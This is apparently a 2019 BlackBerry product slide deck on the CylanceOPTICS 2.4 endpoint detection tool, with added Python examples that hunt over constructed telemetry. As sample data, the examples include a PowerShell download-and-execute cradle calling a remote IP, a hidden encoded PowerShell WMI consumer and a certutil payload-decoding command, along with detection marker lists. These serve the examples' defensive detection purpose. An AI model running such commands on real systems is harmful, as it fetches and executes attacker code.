CylanceOPTICS AI-Powered EDR - BlackBerry


CylanceOPTICS 2.4: Extended Visibility and Unparalleled Prevention

Matthiew Morin, Senior Product Manager

Agenda

▪ CylanceOPTICS Overview
▪ What are the key components of CylanceOPTICS?
▪ What is new in CylanceOPTICS v2.4?
▪ What are experts saying about CylanceOPTICS?

What is CylanceOPTICS?

CylanceOPTICS is the endpoint detection and response (EDR) component of the BlackBerry Cylance AI Platform™ that leverages and augments the prevention delivered by CylancePROTECT®, providing the consistent visibility required to discover and remediate hard-to-find threats.

DATA SCIENCE · HUMAN EXPERTISE · THREAT RESEARCH

▪ CylancePROTECT: AI-Native Endpoint Threat Prevention
▪ Cylance Smart Antivirus™: AI-Powered Protection for Home and Small Business
▪ CylanceThreatZERO™: Solution Implementation and Human Expertise
▪ Cylance Consulting: World Class IR, Forensics, ICS and Red Team Services
▪ CylanceOPTICS: ML-Powered Endpoint Detection and Response
▪ CylanceGUARD™: Proactive Managed Detection and Response

CylanceOPTICS: AI-Driven Endpoint Prevention

▪ Prevent attacks
▪ Constantly monitor endpoints
▪ Automated decisive action
▪ Smart threat hunting with InstaQuery
▪ Tap into contextual info with Focus View

Source: https://www.gartner.com/reviews/market/endpoint-detection-and-response-solutions

How Do Analysts Define EDR?

CylanceOPTICS + Services

▪ DETECTION: Use various data analytics techniques to detect suspicious system behavior.
▪ INVESTIGATION: Provide contextual information; record and store endpoint-system-level behaviors.
▪ CONTAINMENT: Block malicious activity.
▪ REMEDIATION: Provide remediation suggestions to restore affected systems.

Source: https://www.gartner.com/reviews/market/endpoint-detection-and-response-solutions

CylanceOPTICS Does What Others Can’t: Prevention-First EDR

▪ Focus is on preventing the “unknown unknowns”
▪ Detection is an extension of our prevention-based security
▪ Adding detection improves our ability to prevent future attacks
▪ Preventing attacks creates more time for proactive security practices

CylanceOPTICS Features and Benefits

Context Analysis Engine

▪ ML-powered detection on endpoints
▪ Constantly evolving detection logic provided by Cylance’s Threat Research team:
  ▪ MITRE ATT&CK
  ▪ Novel attacks and actors seen in the field
▪ Highly extensible custom logic exposed to Users and Partners

InstaQuery

▪ “Has this been seen in my environment?”
▪ InstaQuery is a lightweight analyst query with instant access to the results
▪ Lets analysts quickly determine if an endpoint is at risk

USE CASE: Hunt for the prevalence of ransomware IOCs throughout a global environment

Focus View

▪ “How did this threat get on a device?”
▪ Conduct root cause analysis
▪ Automatically gather contextual evidence on:
  ▪ Threats
  ▪ Incidents
  ▪ Artifacts

USE CASES:
1. See command line arguments used to decrypt initial ransomware payloads
2. Observe support files being introduced by malware
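Added example, not CylanceOPTICS code: the root-cause walk a Focus View performs, run over constructed process-start telemetry. The PIDs, paths, the invoice.docm lure and the certutil -decode staging step are hypothetical, the record layout and function names are this example's own, and the list of "decode markers" is an assumption about which command lines count as payload staging.

```python
"""Root-cause walk over constructed process-start events.

Given the process in which a threat was detected, follow parent links
back to the root, list the command line at each hop (use case 1) and
the files each hop wrote (use case 2).
"""
from dataclasses import dataclass, field


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str
    files_written: list = field(default_factory=list)


# Constructed sample telemetry (hypothetical PIDs and paths).
EVENTS = [
    ProcEvent(400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1200, 400, r"C:\Program Files\Mail\mail.exe", "mail.exe"),
    ProcEvent(1300, 1200, r"C:\Program Files\Office\WINWORD.EXE",
              r'WINWORD.EXE /n "C:\Users\u\Downloads\invoice.docm"'),
    ProcEvent(1400, 1300, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c certutil -decode C:\\Users\\u\\AppData\\Local\\Temp\\a.txt "
              "C:\\Users\\u\\AppData\\Local\\Temp\\a.exe",
              files_written=[r"C:\Users\u\AppData\Local\Temp\a.exe"]),
    ProcEvent(1500, 1400, r"C:\Users\u\AppData\Local\Temp\a.exe",
              "a.exe --install",
              files_written=[r"C:\Users\u\AppData\Roaming\svc\helper.dll"]),
]

# Assumed markers for "a payload is being decoded/staged here".
DECODE_MARKERS = ("certutil -decode", "-enc", "frombase64string")


def ancestry(events, pid):
    """Return the chain [root, ..., pid] by following ppid links.

    Stops at an unknown parent and guards against PID-reuse cycles."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    chain.reverse()
    return chain


def focus_view(events, pid):
    """One dict per hop: image, full command line and written artifacts."""
    return [{"pid": e.pid, "image": e.image.rsplit("\\", 1)[-1],
             "cmdline": e.cmdline, "artifacts": list(e.files_written)}
            for e in ancestry(events, pid)]


def decode_steps(events, pid):
    """Command lines in the chain that decode or stage a payload."""
    return [e.cmdline for e in ancestry(events, pid)
            if any(m in e.cmdline.lower() for m in DECODE_MARKERS)]


if __name__ == "__main__":
    for hop in focus_view(EVENTS, 1500):
        print(hop)
    print(decode_steps(EVENTS, 1500))
```

The walk is keyed on PID only; on a real endpoint the parent link should be keyed on (PID, start time) or a process GUID, because Windows reuses PIDs and a stale parent can splice an unrelated process into the chain.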

Packages & Playbooks

▪ Package Deploy allows complex actions to be taken on endpoints at scale, on demand:
  ▪ Execute applications
  ▪ Collect artifacts
▪ Playbooks allow the same complex actions to be taken automatically when suspicious activity is detected:
  ▪ Collect additional critical forensic information as soon as an incident occurs
▪ Scripting engine is exposed to Users and Partners for near-infinite flexibility

Enhanced Visibility in CylanceOPTICS 2.4

What’s New in CylanceOPTICS 2.4?

1. 2x visibility into endpoints
2. 5x addressable space with the Context Analysis Engine
3. New InstaQuery artifacts and facets
4. New Focus View data points

What’s New in CylanceOPTICS 2.4?

Enhanced visibility across several key events and focus points:

▪ DNS: See which processes are resolving domains. Analyze the resolved addresses, record types, and more.
▪ PowerShell Introspection: See activity occurring within a PowerShell interpreter, or ‘novel’ methods of invoking PowerShell. Analyze the script payloads and content.
▪ WMI Introspection: See activity occurring within a WMI interpreter. Analyze WMI consumers, event filters, and referenced files.
▪ Portable Executable Parsing: Use CylanceOPTICS to conduct static analysis of critical executable file information. Analyze file version information, functions, import tables, and more.
▪ Private Address (RFC 1918 / RFC 4193) Space Visibility: Analyzes an event originating from a private (RFC 1918 IPv4 or RFC 4193 IPv6 unique-local) address on a TCP/IP network.
▪ Windows Logon Event Visibility: Records what instigated a Windows logon event, the user that logged on, from which IP address and domain it was initiated, when it was initiated, and artifacts of the initiation.
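Added example, not CylanceOPTICS code, combining the DNS and private-address-space items above: process-to-DNS records are constructed here (hostnames, images, names and addresses are hypothetical), the RFC 1918 / RFC 4193 check is written out as explicit networks rather than Python's broader `is_private`, and the "external name resolving into private space" rule plus the internal-zone suffix are this example's own assumptions.

```python
"""Process-to-DNS visibility with RFC 1918 / RFC 4193 classification.

Answers the 2.4 questions over constructed DNS-response events: which
process resolved a name, what came back, and whether the answer lies in
private address space even though the name is not an internal one.
"""
import ipaddress

# Exactly the RFC 1918 (IPv4) and RFC 4193 (IPv6 ULA) ranges.  This is
# deliberately narrower than ipaddress.ip_address(x).is_private, which
# also counts loopback, link-local, documentation and reserved blocks.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]

# Assumed internal DNS zone for this example.
INTERNAL_SUFFIXES = (".corp.local",)

# Constructed sample events (hypothetical hosts, processes, names, addresses).
DNS_EVENTS = [
    {"host": "WS-01", "pid": 4312, "image": "chrome.exe",
     "qname": "updates.example.com", "rtype": "A", "rdata": "203.0.113.10"},
    {"host": "WS-01", "pid": 5120, "image": "powershell.exe",
     "qname": "cdn.example.net", "rtype": "A", "rdata": "10.20.30.40"},
    {"host": "WS-02", "pid": 701, "image": "svchost.exe",
     "qname": "fileserver.corp.local", "rtype": "AAAA", "rdata": "fd12:3456::10"},
    {"host": "WS-02", "pid": 902, "image": "rundll32.exe",
     "qname": "cdn.example.net", "rtype": "A", "rdata": "10.20.30.40"},
]


def is_rfc_private(addr):
    """True if addr is inside RFC 1918 or RFC 4193 space (version-aware)."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in PRIVATE_NETS)


def process_resolvers(events, qname):
    """'Which processes are resolving this domain?' -> sorted (host, image)."""
    return sorted({(e["host"], e["image"]) for e in events
                   if e["qname"].lower() == qname.lower()})


def names_resolving_to(events, rdata):
    """'Has a domain ever resolved to this address?' -> sorted names."""
    target = ipaddress.ip_address(rdata)
    return sorted({e["qname"] for e in events
                   if ipaddress.ip_address(e["rdata"]) == target})


def external_names_with_private_answers(events):
    """Names outside the internal zone that resolve into private space.

    A public name answering with an RFC 1918/4193 address is a rebinding,
    tunnelling or split-horizon anomaly worth a Focus View look."""
    hits = []
    for e in events:
        internal = e["qname"].lower().endswith(INTERNAL_SUFFIXES)
        if not internal and is_rfc_private(e["rdata"]):
            hits.append((e["host"], e["image"], e["qname"], e["rdata"]))
    return hits


if __name__ == "__main__":
    print(process_resolvers(DNS_EVENTS, "cdn.example.net"))
    print(names_resolving_to(DNS_EVENTS, "10.20.30.40"))
    print(external_names_with_private_answers(DNS_EVENTS))
```

Note that `169.254.1.1` is rejected by `is_rfc_private` although Python's `is_private` accepts it; if the goal is "not routable on the internet" rather than "RFC 1918/4193", widen `PRIVATE_NETS` explicitly instead of switching to `is_private`, so the rule stays auditable.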

InstaQuery – DNS Request

▪ Question Name: “Has mydomain.net been seen?”
▪ Record Value: “Has a domain ever resolved to this?”

InstaQuery – PowerShell Trace

▪ Event ID: “Show me all matches for Event ID 4101.”
▪ Script Block Text: “Has a script executed with this text in it?”
▪ Payload: “Has a payload or module executed with this text in it?”

InstaQuery – WMI Trace

▪ Event ID: “Show me all matches for Event ID 5861.”
▪ Consumer Text: “Has a WMI consumer been created with this text in it?”
▪ Namespace: “Has a WMI action been taken in this Namespace?”
▪ Operation: “Has a WMI operation executed with this text in it?”


InstaQuery – Windows Event

▪ Event ID: “Show me all matches for Event ID 4624.”
▪ Provider ID: “Show me all events from the SecurityAudit provider.”
▪ Class: “Show me all ‘LogonLogoff’ events.”
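Added example, not CylanceOPTICS code, of the facet-style hunt the PowerShell, WMI and Windows Event slides describe, run over constructed event records. The records mimic three real log sources: Microsoft-Windows-PowerShell/Operational event 4104 (script block text, which is where script content is logged when script block logging is on), Microsoft-Windows-WMI-Activity/Operational event 5861 (a permanent WMI event consumer binding being created) and Security event 4624 (successful logon). Hostnames, users, addresses and the encoded command are hypothetical, and the facet names and matching rules are this example's own, not InstaQuery's.

```python
"""InstaQuery-style facet hunt over constructed Windows event records.

hunt() answers "has X been seen with this text in it?"; prevalence()
turns the matches into the list of affected hosts.
"""

# Constructed sample records (hypothetical hosts, users, addresses).
EVENTS = [
    {"host": "WS-01", "provider": "Microsoft-Windows-PowerShell", "id": 4104,
     "script_block": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"},
    {"host": "WS-01", "provider": "Microsoft-Windows-PowerShell", "id": 4104,
     "script_block": "Get-ChildItem C:\\Users"},
    {"host": "WS-02", "provider": "Microsoft-Windows-WMI-Activity", "id": 5861,
     "namespace": "root\\subscription", "operation": "Created",
     "consumer": "CommandLineEventConsumer: powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"host": "WS-03", "provider": "Microsoft-Windows-Security-Auditing", "id": 4624,
     "category": "Logon/Logoff", "user": "CORP\\svc_backup", "logon_type": 3,
     "src_ip": "10.9.8.7"},
    {"host": "WS-03", "provider": "Microsoft-Windows-Security-Auditing", "id": 4624,
     "category": "Logon/Logoff", "user": "CORP\\jdoe", "logon_type": 10,
     "src_ip": "10.9.8.20"},
]


def hunt(events, **facets):
    """Return the records in which every facet matches.

    String facets match as case-insensitive substrings (the "with this
    text in it" questions); non-string facets such as id or logon_type
    must be equal.  A record lacking the facet's field never matches,
    so a namespace facet cannot accidentally hit a logon record."""
    def ok(record, key, want):
        have = record.get(key)
        if have is None:
            return False
        if isinstance(want, str):
            return want.lower() in str(have).lower()
        return have == want

    return [r for r in events if all(ok(r, k, v) for k, v in facets.items())]


def prevalence(events, **facets):
    """Sorted hosts on which the facet combination was seen."""
    return sorted({r["host"] for r in hunt(events, **facets)})


if __name__ == "__main__":
    # Download cradle in a script block anywhere in the fleet?
    print(prevalence(EVENTS, id=4104, script_block="DownloadString"))
    # Permanent WMI consumer carrying an encoded PowerShell command?
    print(prevalence(EVENTS, id=5861, consumer="-enc"))
    # Network (type 3) logons reported by the Security-Auditing provider.
    print(hunt(EVENTS, provider="Security-Auditing", id=4624, logon_type=3))
```

The substring rule is what makes a one-line IOC ("-enc", "DownloadString", a namespace) reusable across sources, but it also makes short facets noisy; pair a short text facet with an id or provider facet, as the calls above do, rather than hunting for it alone.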

What Are Experts Saying About CylanceOPTICS?

Gartner Peer Insights and Forrester: Total Economic Impact™ Study

“Cylance is the best of breed in threat detection and prevention. Since installing CylancePROTECT and OPTICS, we can sleep at night.”
— Gartner Peer Insights, April 2019.

In a study by Forrester, CylanceOPTICS:
▪ Improved the security team’s productivity by 10%
▪ Reduced lost time by 95%
▪ Reduced the expected cost of a major security breach by 25%
— Forrester: The Total Economic Impact™ Study of CylancePROTECT® and CylanceOPTICS™, May 2019

Questions & Answers

© 2019 Cylance Inc. All Rights Reserved.